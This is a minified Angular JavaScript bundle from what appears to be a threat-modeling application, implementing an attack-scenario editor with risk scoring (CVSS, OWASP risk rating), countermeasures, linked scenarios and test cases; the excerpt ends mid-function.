q7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(V(3).selectedTestCase=r)}),s(1,"\n "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",89),s(6),u(),s(7,"\n "),m(8,"button",91),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(2),at("matTooltip",re(9,7,"general.Remove"))}}function G7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n "),it(2,"app-test-case",103),s(3,"\n "),u()),2&t){const e=V(3);g(2),F("testCase",e.selectedTestCase)}}function j7e(t,a){if(1&t){const e=Ye();m(0,"div",48),s(1,"\n "),m(2,"div",49),s(3,"\n "),m(4,"mat-list",50),s(5,"\n "),m(6,"div",51),s(7),oe(8,"translate"),m(9,"button",52),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n "),m(14,"mat-menu",null,100),s(16,"\n "),m(17,"input",34,101),he("ngModelChange",function(n){return be(e),Me(V(2).searchTCString=n)})("click",function(){return be(e),Me(V(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n "),ne(21,H7e,2,2,"button",40),s(22,"\n "),u(),s(23,"\n "),m(24,"mat-menu",null,102),s(26,"\n "),ne(27,U7e,2,2,"button",40),s(28,"\n "),u(),s(29,"\n "),u(),s(30,"\n "),ne(31,q7e,13,9,"mat-list-item",59),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),m(35,"div",60),s(36,"\n "),ne(37,G7e,4,1,"div",61),s(38,"\n "),u(),s(39,"\n "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=V(2);g(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),g(3),ct("",re(8,14,"properties.LinkedTestCases")," \n "),g(2),at("matTooltip",re(10,16,"general.Add")),F("matMenuTriggerFor",e),g(8),at("placeholder",re(19,18,"general.Search")),F("ngModel",n.searchTCString)("matMenuTriggerFor",i),g(4),F("ngForOf",n.GetTestCases()),g(6),F("ngForOf",n.GetFilteredTestCases()),g(4),F("ngForOf",n.attackScenario.GetTestCases()),g(6),F("ngIf",n.selectedTestCase)}}function Q7e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",1),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(V().attackScenario.Name=n)}),u(),s(10,"\n "),ne(11,U5e,6,3,"button",4),s(12,"\n "),u(),s(13,"\n "),m(14,"mat-form-field",5),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(V().attackScenario.Number=n)}),u(),s(21,"\n "),ne(22,q5e,3,3,"mat-hint",7),s(23,"\n "),u(),s(24,"\n "),it(25,"br"),s(26,"\n "),m(27,"mat-form-field",8),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(V().attackScenario.ThreatState=n)}),oe(34,"translate"),s(35,"\n "),ne(36,G5e,3,4,"mat-option",10),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),ne(40,j5e,3,3,"mat-icon",11),s(41,"\n "),it(42,"br"),s(43,"\n "),m(44,"mat-form-field",12),s(45,"\n "),m(46,"mat-label"),s(47),oe(48,"translate"),u(),s(49,"\n "),it(50,"input",13),s(51,"\n "),u(),s(52,"\n "),m(53,"mat-form-field",14),s(54,"\n "),m(55,"mat-label"),s(56),oe(57,"translate"),u(),s(58,"\n "),it(59,"input",15),s(60,"\n "),u(),s(61,"\n "),m(62,"mat-form-field",16),s(63,"\n "),m(64,"mat-label"),s(65),oe(66,"translate"),u(),s(67,"\n "),it(68,"input",13),s(69,"\n "),u(),s(70,"\n "),it(71,"br"),s(72,"\n "),m(73,"mat-form-field",8),s(74,"\n "),m(75,"mat-label"),s(76),oe(77,"translate"),oe(78,"translate"),u(),s(79,"\n "),m(80,"mat-select",17),he("valueChange",function(n){return be(e),Me(V().attackScenario.AttackVector=n)}),s(81,"\n "),m(82,"input",18),he("keyup",function(n){return be(e),Me(V().OnSearchAttackVectors(n))}),oe(83,"translate"),u(),s(84,"\n "),m(85,"mat-option"),s(86),oe(87,"translate"),u(),s(88,"\n "),ne(89,$5e,4,2,"mat-optgroup",19),s(90,"\n "),u(),s(91,"\n "),m(92,"button",20),he("click",function(n){return be(e),V().AddAttackVector(),Me(n.stopPropagation())}),oe(93,"translate"),s(94,"\n "),m(95,"mat-icon"),s(96,"add"),u(),s(97,"\n "),u(),s(98,"\n "),u(),s(99,"\n "),m(100,"mat-form-field",21),s(101,"\n "),m(102,"mat-label"),s(103),oe(104,"translate"),u(),s(105,"\n "),m(106,"mat-select",22),he("valueChange",function(n){return be(e),Me(V().attackScenario.ThreatCategories=n)})("selectionChange",function(){return be(e),Me(V().sysThreatGroups=null)}),s(107,"\n "),m(108,"input",18),he("keyup",function(n){return be(e),Me(V().OnSearchThreatCategories(n))}),oe(109,"translate"),u(),s(110,"\n "),ne(111,X5e,4,2,"mat-optgroup",19),s(112,"\n "),u(),s(113,"\n "),u(),s(114,"\n "),m(115,"mat-form-field",23),s(116,"\n "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n "),m(121,"mat-select",24),he("valueChange",function(n){return be(e),Me(V().attackScenario.SystemThreats=n)}),s(122,"\n "),m(123,"input",18),he("keyup",function(n){return be(e),Me(V().OnSearchSystemThreat(n))}),oe(124,"translate"),u(),s(125,"\n "),ne(126,J5e,5,4,"mat-optgroup",19),s(127,"\n "),u(),s(128,"\n "),u(),s(129,"\n "),ne(130,t7e,17,9,"mat-form-field",25),s(131,"\n "),m(132,"mat-form-field",26),s(133,"\n "),m(134,"mat-label"),s(135),oe(136,"translate"),u(),s(137,"\n "),m(138,"textarea",27),he("ngModelChange",function(n){return be(e),Me(V().attackScenario.Description=n)}),u(),s(139,"\n "),u(),s(140,"\n "),it(141,"app-tags",28),s(142),oe(143,"translate"),m(144,"button",29),oe(145,"translate"),s(146,"\n "),m(147,"mat-icon"),s(148,"more_vert"),u(),s(149,"\n "),u(),s(150,"\n "),m(151,"mat-menu",null,30),s(153,"\n "),m(154,"button",31),he("click",function(){return be(e),Me(V().AddMethodCVSS())}),s(155),oe(156,"translate"),u(),s(157,"\n "),m(158,"button",31),he("click",function(){return be(e),Me(V().AddMethodOwaspRR())}),s(159),oe(160,"translate"),u(),s(161,"\n "),m(162,"button",32),s(163),oe(164,"translate"),u(),s(165,"\n "),u(),s(166,"\n "),m(167,"mat-menu",null,33),s(169,"\n "),m(170,"input",34,35),he("ngModelChange",function(n){return be(e),Me(V().searchASString=n)})("click",function(){return be(e),Me(V().OnSearchASBoxClick())}),oe(172,"translate"),u(),s(173,"\n "),ne(174,i7e,2,5,"button",36),s(175,"\n "),u(),s(176,"\n "),m(177,"mat-menu",null,37),s(179,"\n "),ne(180,n7e,3,1,"ng-template",38),s(181," \n "),u(),s(182,"\n "),m(183,"mat-menu",null,39),s(185,"\n "),ne(186,o7e,2,2,"button",40),s(187,"\n "),u(),s(188,"\n "),ne(189,r7e,20,4,"mat-form-field",41),s(190,"\n "),ne(191,c7e,27,8,"mat-form-field",41),s(192,"\n "),m(193,"mat-form-field",42),s(194,"\n "),m(195,"mat-label"),s(196),oe(197,"translate"),u(),s(198,"\n "),m(199,"mat-select",43),he("valueChange",function(n){return be(e),Me(V().attackScenario.Severity=n)})("selectionChange",function(){return be(e),Me(V().attackScenario.CalculateRisk())}),s(200,"\n "),m(201,"mat-option"),s(202),oe(203,"translate"),u(),s(204,"\n "),ne(205,l7e,3,4,"mat-option",10),s(206,"\n "),u(),s(207,"\n "),ne(208,d7e,5,0,"button",44),s(209,"\n "),ne(210,m7e,5,0,"button",44),s(211,"\n "),u(),s(212,"\n "),m(213,"mat-form-field",45),s(214,"\n "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n "),m(219,"mat-select",43),he("valueChange",function(n){return be(e),Me(V().attackScenario.Likelihood=n)})("selectionChange",function(){return be(e),Me(V().attackScenario.CalculateRisk())}),s(220,"\n "),m(221,"mat-option"),s(222),oe(223,"translate"),u(),s(224,"\n "),ne(225,u7e,3,4,"mat-option",10),s(226,"\n "),u(),s(227,"\n "),ne(228,h7e,5,0,"button",44),s(229,"\n "),ne(230,f7e,5,0,"button",44),s(231,"\n "),u(),s(232,"\n "),m(233,"mat-form-field",45),s(234,"\n "),m(235,"mat-label"),s(236),oe(237,"translate"),u(),s(238,"\n "),m(239,"mat-select",46),he("valueChange",function(n){return be(e),Me(V().attackScenario.Risk=n)}),s(240,"\n "),m(241,"mat-option"),s(242),oe(243,"translate"),u(),s(244,"\n "),ne(245,p7e,3,4,"mat-option",10),s(246,"\n "),u(),s(247,"\n "),ne(248,_7e,5,0,"button",44),s(249,"\n "),ne(250,g7e,5,0,"button",44),s(251,"\n "),u(),s(252,"\n "),m(253,"mat-form-field",45),s(254,"\n "),m(255,"mat-label"),s(256),oe(257,"translate"),u(),s(258,"\n "),m(259,"mat-select",46),he("valueChange",function(n){return be(e),Me(V().attackScenario.RiskStrategy=n)}),s(260,"\n "),m(261,"mat-option"),s(262),oe(263,"translate"),u(),s(264,"\n "),ne(265,C7e,3,4,"mat-option",10),s(266,"\n "),u(),s(267,"\n "),u(),s(268,"\n "),ne(269,y7e,8,5,"mat-form-field",47),s(270,"\n "),ne(271,b7e,8,5,"mat-form-field",47),s(272,"\n "),ne(273,M7e,8,5,"mat-form-field",47),s(274,"\n "),m(275,"mat-form-field",26),s(276,"\n "),m(277,"mat-label"),s(278),oe(279,"translate"),u(),s(280,"\n "),m(281,"textarea",27),he("ngModelChange",function(n){return be(e),Me(V().attackScenario.RiskStrategyReason=n)}),u(),s(282,"\n "),u(),s(283,"\n "),m(284,"div",48),s(285,"\n "),m(286,"div",49),s(287,"\n "),m(288,"mat-list",50),s(289,"\n "),m(290,"div",51),s(291),oe(292,"translate"),m(293,"button",52),oe(294,"translate"),m(295,"mat-icon"),s(296,"add"),u()(),s(297,"\n "),m(298,"mat-menu",null,53),s(300,"\n "),m(301,"button",54),he("click",function(){return be(e),Me(V().AddCountermeasure())}),s(302),oe(303,"translate"),u(),s(304,"\n "),m(305,"button",32),s(306),oe(307,"translate"),u(),s(308,"\n "),u(),s(309,"\n "),m(310,"mat-menu",null,55),s(312,"\n "),m(313,"input",34,56),he("ngModelChange",function(n){return be(e),Me(V().searchCMString=n)})("click",function(){return be(e),Me(V().OnSearchCMBoxClick())}),oe(315,"translate"),u(),s(316,"\n "),ne(317,v7e,2,5,"button",36),s(318,"\n "),u(),s(319,"\n "),m(320,"mat-menu",null,57),s(322,"\n "),ne(323,T7e,3,1,"ng-template",38),s(324," \n "),u(),s(325,"\n "),m(326,"mat-menu",null,58),s(328,"\n "),ne(329,E7e,2,2,"button",40),s(330,"\n "),u(),s(331,"\n "),u(),s(332,"\n "),ne(333,D7e,19,14,"mat-list-item",59),s(334,"\n "),u(),s(335,"\n "),u(),s(336,"\n "),m(337,"div",60),s(338,"\n "),ne(339,x7e,4,1,"div",61),s(340,"\n "),u(),s(341,"\n "),u(),s(342,"\n "),m(343,"mat-accordion",62),s(344,"\n "),ne(345,I7e,17,4,"mat-expansion-panel",63),s(346,"\n "),ne(347,S7e,17,4,"mat-expansion-panel",63),s(348,"\n "),ne(349,P7e,17,4,"mat-expansion-panel",63),s(350,"\n "),ne(351,N7e,17,4,"mat-expansion-panel",63),s(352,"\n "),u(),s(353,"\n "),it(354,"br"),s(355,"\n "),m(356,"div",48),s(357,"\n "),m(358,"div",49),s(359,"\n "),m(360,"mat-list",50),s(361,"\n "),m(362,"div",51),s(363),oe(364,"translate"),m(365,"button",52),oe(366,"translate"),m(367,"mat-icon"),s(368,"add"),u()(),s(369,"\n "),m(370,"mat-menu",null,64),s(372,"\n "),m(373,"input",34,65),he("ngModelChange",function(n){return be(e),Me(V().searchLinkedASString=n)})("click",function(){return be(e),Me(V().OnSearchLinkedASBoxClick())}),oe(375,"translate"),u(),s(376,"\n "),ne(377,L7e,2,5,"button",36),s(378,"\n "),u(),s(379,"\n "),m(380,"mat-menu",null,66),s(382,"\n "),ne(383,W7e,3,1,"ng-template",38),s(384," \n "),u(),s(385,"\n "),m(386,"mat-menu",null,67),s(388,"\n "),ne(389,F7e,2,2,"button",40),s(390,"\n "),u(),s(391,"\n "),u(),s(392,"\n "),ne(393,V7e,18,12,"mat-list-item",59),s(394,"\n "),u(),s(395,"\n "),u(),s(396,"\n "),m(397,"div",60),s(398,"\n "),ne(399,B7e,4,2,"div",61),s(400,"\n "),u(),s(401,"\n "),u(),s(402,"\n "),ne(403,j7e,40,20,"div",68),s(404,"\n"),u()}if(2&t){const e=Ti(152),i=Ti(168),n=Ti(184),r=Ti(299),c=Ti(311),d=Ti(327),T=Ti(371),k=Ti(387),q=V();let Y,te;Ct("disable",!q.canEdit),g(5),ke(re(6,131,"properties.Name")),g(3),at("matTooltip",q.attackScenario.Name),F("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Name),g(3),F("ngIf",q.attackScenario.Name),g(6),ke(re(18,133,"general.Number")),g(3),at("matTooltip",q.attackScenario.Number),F("ngModel",q.attackScenario.Number),g(2),F("ngIf",q.attackScenario.CheckUniqueNumber()),g(8),ke(re(31,135,"properties.Status")),g(3),at("matTooltip",re(34,137,q.GetThreatStateName(q.attackScenario.ThreatState))),F("value",q.attackScenario.ThreatState),g(3),F("ngForOf",q.GetThreatStates()),g(4),F("ngIf",!q.attackScenario.RuleStillApplies),g(7),ke(re(48,139,"general.Target")),g(3),at("matTooltip",null==q.attackScenario.Target?null:q.attackScenario.Target.GetProperty("Name")),F("spellcheck",q.dataService.HasSpellCheck)("value",null==q.attackScenario.Target?null:q.attackScenario.Target.Name),g(6),ke(re(57,141,"general.Targets")),g(3),F("spellcheck",q.dataService.HasSpellCheck)("value",q.GetTargetsNames()),g(6),ke(re(66,143,"general.Diagram")),g(3),at("matTooltip",null==(Y=q.attackScenario.GetDiagram())?null:Y.Name),F("spellcheck",q.dataService.HasSpellCheck)("value",null==(te=q.attackScenario.GetDiagram())?null:te.Name),g(8),za("",re(77,145,"general.AttackVector")," (",re(78,147,"general.Informative"),")"),g(4),at("matTooltip",null==q.attackScenario.AttackVector?null:q.attackScenario.AttackVector.Name),F("value",q.attackScenario.AttackVector),g(2),at("placeholder",re(83,149,"general.Search")),g(4),ke(re(87,151,"properties.selectNone")),g(3),F("ngForOf",q.GetAttackVectorGroups()),g(3),at("matTooltip",re(93,153,"general.Add")),g(11),ct("",re(104,155,"general.ThreatCategories"),"*"),g(3),F("value",q.attackScenario.ThreatCategories),g(2),at("placeholder",re(109,157,"general.Search")),g(3),F("ngForOf",q.GetThreatCategoryGroups()),g(4),XS("width: calc(100% - ",q.GetSystemThreatsWidth(),");"),g(3),ke(re(119,159,"general.SystemThreats")),g(3),F("value",q.attackScenario.SystemThreats),g(2),at("placeholder",re(124,161,"general.Search")),g(3),F("ngForOf",q.GetSystemThreatGroups()),g(4),F("ngIf",q.dataService.Project.Settings.ThreatActorToAttackScenario),g(5),ke(re(136,163,"properties.Description")),g(3),F("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.Description),g(3),F("tagableElement",q.attackScenario),g(1),ct("\n ",re(143,165,"general.RiskAssessment")," \n "),g(2),at("matTooltip",re(145,167,"general.More")),F("matMenuTriggerFor",e),g(10),F("disabled",null!=q.attackScenario.ScoreCVSS),g(1),ke(re(156,169,"pages.modeling.attackscenario.addCVSS")),g(3),F("disabled",null!=q.attackScenario.ScoreOwaspRR),g(1),ke(re(160,171,"pages.modeling.attackscenario.addOwaspRR")),g(3),F("matMenuTriggerFor",i),g(1),ke(re(164,173,"pages.modeling.attackscenario.takeRiskValuesFrom")),g(7),at("placeholder",re(172,175,"general.Search")),F("ngModel",q.searchASString)("matMenuTriggerFor",n),g(4),F("ngForOf",q.GetAttackScenarioGroups()),g(12),F("ngForOf",q.GetFilteredAttackScenarios()),g(3),F("ngIf",q.attackScenario.ScoreCVSS),g(2),F("ngIf",q.attackScenario.ScoreOwaspRR),g(5),ke(re(197,177,"properties.Severity")),g(3),F("value",q.attackScenario.Severity),g(3),ke(re(203,179,"properties.selectNone")),g(3),F("ngForOf",q.GetSeverityTypes()),g(3),F("ngIf",null==q.attackScenario.SeverityReason),g(2),F("ngIf",null!=q.attackScenario.SeverityReason),g(6),ke(re(217,181,"general.Likelihood")),g(3),F("value",q.attackScenario.Likelihood),g(3),ke(re(223,183,"properties.selectNone")),g(3),F("ngForOf",q.GetLMHValues()),g(3),F("ngIf",null==q.attackScenario.LikelihoodReason),g(2),F("ngIf",null!=q.attackScenario.LikelihoodReason),g(6),ke(re(237,185,"properties.Risk")),g(3),F("value",q.attackScenario.Risk),g(3),ke(re(243,187,"properties.selectNone")),g(3),F("ngForOf",q.GetSeverityTypes()),g(3),F("ngIf",null==q.attackScenario.RiskReason),g(2),F("ngIf",null!=q.attackScenario.RiskReason),g(6),ke(re(257,189,"properties.RiskStrategy")),g(3),F("value",q.attackScenario.RiskStrategy),g(3),ke(re(263,191,"properties.selectNone")),g(3),F("ngForOf",q.GetRiskStrategies()),g(4),F("ngIf",null!=q.attackScenario.SeverityReason),g(2),F("ngIf",null!=q.attackScenario.LikelihoodReason),g(2),F("ngIf",null!=q.attackScenario.RiskReason),g(5),ke(re(279,193,"properties.RiskStrategyReason")),g(3),F("spellcheck",q.dataService.HasSpellCheck)("ngModel",q.attackScenario.RiskStrategyReason),g(7),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),g(3),ct("",re(292,195,"general.Countermeasures")," \n "),g(2),at("matTooltip",re(294,197,"general.Add")),F("matMenuTriggerFor",r),g(9),ke(re(303,199,"general.New")),g(3),F("matMenuTriggerFor",c),g(1),ke(re(307,201,"general.Existing")),g(7),at("placeholder",re(315,203,"general.Search")),F("ngModel",q.searchCMString)("matMenuTriggerFor",d),g(4),F("ngForOf",q.GetCountermeasureGroups()),g(12),F("ngForOf",q.GetFilteredCountermeasures()),g(4),F("ngForOf",q.countermeasures),g(6),F("ngIf",q.selectedCountermeasure),g(6),F("ngIf",q.attackScenario.CveEntry),g(2),F("ngIf",q.attackScenario.AttackVector),g(2),F("ngIf",q.attackScenario.ThreatQuestion),g(2),F("ngIf",q.attackScenario.ThreatRule),g(9),Ct("prop-list-light",!q.theme.IsDarkMode)("prop-list-dark",q.theme.IsDarkMode),g(3),ct("",re(364,205,"properties.LinkedScenarios")," \n "),g(2),at("matTooltip",re(366,207,"general.Add")),F("matMenuTriggerFor",T),g(8),at("placeholder",re(375,209,"general.Search")),F("ngModel",q.searchLinkedASString)("matMenuTriggerFor",k),g(4),F("ngForOf",q.GetAttackScenarioGroups()),g(12),F("ngForOf",q.GetFilteredLinkedAttackScenarios()),g(4),F("ngForOf",q.attackScenario.LinkedScenarios),g(6),F("ngIf",q.selectedLinkedScenario),g(4),F("ngIf",q.dataService.Project.HasTesting)}}let lM=(()=>{class t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.dialog=c,this.searchCounter=0,this.canEdit=!0,this.searchASString="",this.searchLinkedASString="",this.searchCMString="",this.searchTCString="",this.attackScenario=e,i&&i.subscribe(d=>this.attackScenario=d)}get attackScenario(){return this._attackScenario}set attackScenario(e){this._attackScenario=e,e&&(this.countermeasures=e.GetCountermeasures()),this.selectedCountermeasure=this.selectedLinkedScenario=this.selectedTestCase=null,this.sysThreatGroups=this.threatSources=this.threatCategoryGroups=this.attackVectorGroups=this.attackScenarioGroups=this.countermeasureGroups=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetAttackVectorGroups(){return null==this.attackVectorGroups&&(this.attackVectorGroups=[],this.dataService.Config.GetAttackVectorGroups().forEach(e=>{e.AttackVectors.length>0&&this.attackVectorGroups.push({name:e.Name,AttackVectors:e.AttackVectors})})),this.attackVectorGroups}OnSearchAttackVectors(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.attackVectorGroups=null,this.GetAttackVectorGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.AttackVector;this.attackVectorGroups.forEach(r=>{r.AttackVectors=r.AttackVectors.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.attackVectorGroups=this.attackVectorGroups.filter(r=>r.AttackVectors.length>0)}},250)}GetThreatCategoryGroups(){return null==this.threatCategoryGroups&&(this.threatCategoryGroups=[],this.dataService.Config.GetThreatCategoryGroups().forEach(e=>{e.ThreatCategories.length>0&&this.threatCategoryGroups.push({name:e.Name,ThreatCategories:e.ThreatCategories})})),this.threatCategoryGroups}OnSearchThreatCategories(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatCategoryGroups=null,this.GetThreatCategoryGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatCategories;this.threatCategoryGroups.forEach(r=>{r.ThreatCategories=r.ThreatCategories.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.threatCategoryGroups=this.threatCategoryGroups.filter(r=>r.ThreatCategories.length>0)}},250)}GetSystemThreatGroups(){if(null==this.sysThreatGroups){this.sysThreatGroups=[];const e={name:"general.Highlighted",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>this.attackScenario.ThreatCategories.includes(n.ThreatCategory))},i={name:"general.SystemThreats",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>!e.SystemThreats.includes(n))};e.SystemThreats.length>0&&this.sysThreatGroups.push(e),this.sysThreatGroups.push(i)}return this.sysThreatGroups}OnSearchSystemThreat(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.sysThreatGroups=null,this.GetSystemThreatGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.SystemThreats;this.sysThreatGroups.forEach(r=>{r.SystemThreats=r.SystemThreats.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.sysThreatGroups=this.sysThreatGroups.filter(r=>r.SystemThreats.length>0)}},250)}GetTargetsNames(){if(this.attackScenario.Targets)return this.attackScenario.Targets.map(e=>e.Name).join(", ")}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?this.attackScenario.AttackVector=e:this.dataService.Config.DeleteAttackVector(e)})}AddMethodCVSS(){this.attackScenario.ScoreCVSS={},this.EditMethodCVSS()}EditMethodCVSS(){this.dialog.OpenCVSSEntryDiaglog(this.attackScenario.ScoreCVSS).subscribe(()=>this.OnScoreCVSSChanged())}RemoveMethodCVSS(){this.attackScenario.ScoreCVSS=null}AddMethodOwaspRR(){this.attackScenario.ScoreOwaspRR={},this.EditMethodOwaspRR()}EditMethodOwaspRR(){this.dialog.OpenOwaspRREntryDiaglog(this.attackScenario.ScoreOwaspRR).subscribe(()=>this.OnScoreOwaspRRChanged())}RemoveMethodOwaspRR(){this.attackScenario.ScoreOwaspRR=null}OnScoreCVSSChanged(){this.attackScenario.Severity=Wm.ToThreatSeverity(this.attackScenario.ScoreCVSS.Score),this.attackScenario.CalculateRisk()}OnScoreOwaspRRChanged(){this.attackScenario.Severity=this.attackScenario.ScoreOwaspRR.Impact,this.attackScenario.Likelihood=this.attackScenario.ScoreOwaspRR.Likelihood,this.attackScenario.CalculateRisk()}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetThreatSources(){return null==this.threatSources&&(this.threatSources=this.dataService.Project.GetThreatSources().Sources),this.threatSources}ThreatSourcesAll(){return this.attackScenario.ThreatSources.length==this.dataService.Project.GetThreatSources().Sources.length}ThreatSourcesSome(){return this.attackScenario.ThreatSources.length>0&&!this.ThreatSourcesAll()}ThreatSourcesLabel(){return this.ThreatSourcesAll()?"pages.modeling.attackscenario.threatSourcesNone":"pages.modeling.attackscenario.threatSourcesAll"}ThreatSourcesUpdate(e){this.attackScenario.ThreatSources=e?this.dataService.Project.GetThreatSources().Sources:[]}OnSearchThreatSources(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatSources=null,this.GetThreatSources();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatSources;this.threatSources=this.threatSources.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetFilteredAttackScenarios(){return this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchASString.toLowerCase())&&e!=this.attackScenario)}GetFilteredLinkedAttackScenarios(){return this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchLinkedASString.toLowerCase())&&e!=this.attackScenario&&!this.attackScenario.LinkedScenarios.includes(e))}GetAttackScenarioGroups(){if(null==this.attackScenarioGroups){this.attackScenarioGroups=[];const e=this.dataService.Project.GetAttackScenariosApplicable().filter(i=>i!=this.attackScenario).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.attackScenarioGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,scenarios:e[i]})}),this.attackScenarioGroups.forEach(i=>i.scenarios.sort((n,r)=>n.ThreatState>r.ThreatState?-1:n.ThreatState==r.ThreatState?0:1))}return this.attackScenarioGroups}AdoptRiskValuesFrom(e){e.ScoreCVSS&&(this.attackScenario.ScoreCVSS=JSON.parse(JSON.stringify(e.ScoreCVSS))),e.ScoreOwaspRR&&(this.attackScenario.ScoreOwaspRR=JSON.parse(JSON.stringify(e.ScoreOwaspRR))),this.attackScenario.Severity=e.Severity,this.attackScenario.SeverityReason=e.SeverityReason,this.attackScenario.Likelihood=e.Likelihood,this.attackScenario.LikelihoodReason=e.LikelihoodReason,this.attackScenario.Risk=e.Risk,this.attackScenario.RiskReason=e.RiskReason,this.attackScenario.RiskStrategy=e.RiskStrategy,this.attackScenario.RiskStrategyReason=e.RiskStrategyReason,this.OnLinkScenario(e)}GetRiskStrategies(){return fT.GetKeys()}GetRiskStrategyName(e){return fT.ToString(e)}GetFilteredCountermeasures(){return this.dataService.Project.GetCountermeasuresApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!e.AttackScenarios.includes(this.attackScenario))}GetCountermeasureGroups(){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const e=this.dataService.Project.GetCountermeasuresApplicable().filter(i=>!this.countermeasures.includes(i)).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.countermeasureGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,countermeasures:e[i]})}),this.countermeasureGroups.forEach(i=>i.countermeasures.sort((n,r)=>n.MitigationState>r.MitigationState?-1:n.MitigationState==r.MitigationState?0:1))}return this.countermeasureGroups}AddExistingCountermeasure(e){e.AddAttackScenario(this.attackScenario),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}AddCountermeasure(){const e=this.dataService.Project.CreateCountermeasure(this.attackScenario.ViewID,!1);e.SetMapping(null,this.attackScenario.Targets,[this.attackScenario]),this.selectedCountermeasure=e,this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario)),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}RemoveCountermeasure(e){e.RemoveAttackScenario(this.attackScenario.ID),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}DeleteCountermeasure(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Project.DeleteCountermeasure(e),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this.attackScenario)))})}OnLinkScenario(e){this.attackScenario.AddLinkedAttackScenario(e),e.AddLinkedAttackScenario(this.attackScenario),this.selectedLinkedScenario=e}OnUnlinkScenario(e){this.attackScenario.RemoveLinkedAttackScenario(e.ID),e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedLinkedScenario==e&&(this.selectedLinkedScenario=null)}EditAttackScenario(e){this.dialog.OpenAttackScenarioDialog(e,!1,[this.attackScenario,...this.attackScenario.LinkedScenarios])}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.attackScenario.GetTestCases().includes(e))}GetFilteredTestCases(){return 